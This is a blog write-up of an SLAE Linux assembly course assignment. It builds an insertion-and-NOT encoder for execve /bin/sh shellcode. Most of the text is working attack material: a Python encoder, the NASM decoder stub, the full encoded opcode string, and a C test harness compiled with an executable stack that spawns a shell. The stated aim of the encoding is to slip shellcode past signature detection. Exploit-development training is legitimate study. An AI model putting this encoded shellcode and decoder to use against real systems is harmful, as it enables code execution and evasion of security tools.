SecurityTube Linux Assembly Expert (SLAE) Assignment Writeups — \x04 Insertion Encoder Shellcode

objdump -d ./execve-stack |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'|sed 's/ /\\x/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
NOT(0x01) = NOT(0000 0001) = 1111 1110 = 0xfe
NOT(0x02) = NOT(0000 0010) = 1111 1101 = 0xfd
Shellcode Before Insertion: "\x31\xc0\x50..."
Shellcode After Insertion: "\x31\xfe\xc0\xfd\x50..."
$ cat insertion-encoder-generator.py 
#!/usr/bin/python
# Python Insertion Encoder Generator# Funtion performs not operation (as long as shellcode < 255 bytes)def not_bit(hexString):
num_to_not = eval(hexString)
return hex(255 - num_to_not)
# Execve shellcode which runs /bin/shshellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")# Initialising empty string and numberencoded = ""
num = 1
print 'Encoded shellcode ...'# Insert hex sequence 01, 02, 03 etc between bytes of shellcode, and perform bitwise NOT operation prior to insertingfor byte in bytearray(shellcode) : hexInsert = not_bit("{0:#0{1}x}".format(num,4))
encoded += '0x%02x,' % byte
encoded += hexInsert + ","
num += 1
# Print encoded shellcode with 0xaa twice on end to denote end of shellcode
print encoded + "0xaa,0xaa"
print 'Len: %d' % len(bytearray(shellcode))
$ ./insertion-encoder-generator.py 
Encoded shellcode ...
0x31,0xfe,0xc0,0xfd,0x50,0xfc,0x68,0xfb,0x2f,0xfa,0x2f,0xf9,0x73,0xf8,0x68,0xf7,0x68,0xf6,0x2f,0xf5,0x62,0xf4,0x69,0xf3,0x6e,0xf2,0x89,0xf1,0xe3,0xf0,0x50,0xef,0x89,0xee,0xe2,0xed,0x53,0xec,0x89,0xeb,0xe1,0xea,0xb0,0xe9,0x0b,0xe8,0xcd,0xe7,0x80,0xe6,0xaa,0xaa
Len: 25
; Filename: insertion-decoder.nasm
; Purpose: Decode encoded shellcode (insertion method using NOT and ascending hex number sequence)
global _startsection .text
_start:
jmp short call_shellcode
setup_decoder:
pop esi ; esi points to encoded shellcode
lea edi, [esi +1] ; load esi+1 into edi
xor eax, eax ; zero out to prevent nulls
xor ebx, ebx
xor ecx, ecx
mov al, 1 ; for incrementing postion of esi later
mov cl, 1 ; for xoring not decoded byte later
decoder:
mov bl, byte [esi + eax] ; move encoded insertion byte into bl
not bl ; bitwise not to decode byte
xor bl, cl ; xor values, if equal sets zero flag
jnz short EncodedShellcode ; jumps if decoding done i.e. 0xaa
inc cl ; for ascending hex sequence
mov bl, byte [esi + eax + 1] ; move byte after insertion byte
mov byte [edi], bl ; override value at edi with bl
inc edi ; increment edi one byte
add al, 2 ; increment al two bytes
jmp short decoder
call_shellcode: call setup_decoder
EncodedShellcode: db 0x31,0xfe,0xc0,0xfd,0x50,0xfc,0x68,0xfb,0x2f,0xfa,0x2f,0xf9,0x73,0xf8,0x68,0xf7,0x68,0xf6,0x2f,0xf5,0x62,0xf4,0x69,0xf3,0x6e,0xf2,0x89,0xf1,0xe3,0xf0,0x50,0xef,0x89,0xee,0xe2,0xed,0x53,0xec,0x89,0xeb,0xe1,0xea,0xb0,0xe9,0x0b,0xe8,0xcd,0xe7,0x80,0xe6,0xaa,0xaa
decoder:
mov bl, byte [esi + eax] ; move encoded insertion byte into bl
not bl ; bitwise not to decode byte
xor bl, cl ; xor values, if equal sets zero flag
jnz short EncodedShellcode ; jumps if decoding done i.e. 0xaa
inc cl                        ; for ascending hex sequence
mov bl, byte [esi + eax + 1] ; move byte after insertion byte
mov byte [edi], bl ; override value at edi with bl
inc edi ; increment edi one byte
add al, 2 ; increment al two bytes
jmp short decoder
decoder:
mov bl, byte [esi + eax] ; move encoded insertion byte into bl
not bl ; bitwise not to decode byte
xor bl, cl ; xor values, if equal sets zero flag
jnz short EncodedShellcode ; jumps if decoding done i.e. 0xaa
$ nasm -f elf32 -o insertion-decoder.o insertion-decoder.nasm
$ ld -o insertion-decoder insertion-decoder.o -m elf_i386
$ ./insertion-decoder
Segmentation fault (core dumped)
$ objdump -d ./insertion-decoder |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'|sed 's/ /\\x/g'
"\xeb\x24\x5e\x8d\x7e\x01\x31\xc0\x31\xdb\x31\xc9\xb0\x01\xb1\x01\x8a\x1c\x06\xf6\xd3\x30\xcb\x75\x12\xfe\xc1\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xea\xe8\xd7\xff\xff\xff\x31\xfe\xc0\xfd\x50\xfc\x68\xfb\x2f\xfa\x2f\xf9\x73\xf8\x68\xf7\x68\xf6\x2f\xf5\x62\xf4\x69\xf3\x6e\xf2\x89\xf1\xe3\xf0\x50\xef\x89\xee\xe2\xed\x53\xec\x89\xeb\xe1\xea\xb0\xe9\x0b\xe8\xcd\xe7\x80\xe6\xaa\xaa"
$ cat shellcode.c
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x24\x5e\x8d\x7e\x01\x31\xc0\x31\xdb\x31\xc9\xb0\x01\xb1\x01\x8a\x1c\x06\xf6\xd3\x30\xcb\x75\x12\xfe\xc1\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xea\xe8\xd7\xff\xff\xff\x31\xfe\xc0\xfd\x50\xfc\x68\xfb\x2f\xfa\x2f\xf9\x73\xf8\x68\xf7\x68\xf6\x2f\xf5\x62\xf4\x69\xf3\x6e\xf2\x89\xf1\xe3\xf0\x50\xef\x89\xee\xe2\xed\x53\xec\x89\xeb\xe1\xea\xb0\xe9\x0b\xe8\xcd\xe7\x80\xe6\xaa";
main()
{
printf("Shellcode Length: %d\n", strlen(code));int (*ret)() = (int(*)())code;ret();}$ gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
main()
^~~~
$ ./shellcode
Shellcode Length: 94
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Installing & Verifying GO in VS at MAC

Battle of the Bases

[ Hack The Box ] Gunship - Writeup

Securing swagger ui in production in ASP.Net Core

Getting started with Neo4j and Gephi Tool:

Git -Repository Set up & Initialization Guide

AWS Managed Streaming for Apache Kafka : Streaming messages from producer to consumer using Amazon…

Unity Terrain Tools

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ryuke Ackerman

Ryuke Ackerman

More from Medium

【Deepin Sharing】How to use GSettings

Flattened Device Tree (FDT) Essential for Virtualization Developers

Build a Package (Uboot) with Yocto SDK

PC Battery Indicator for Linux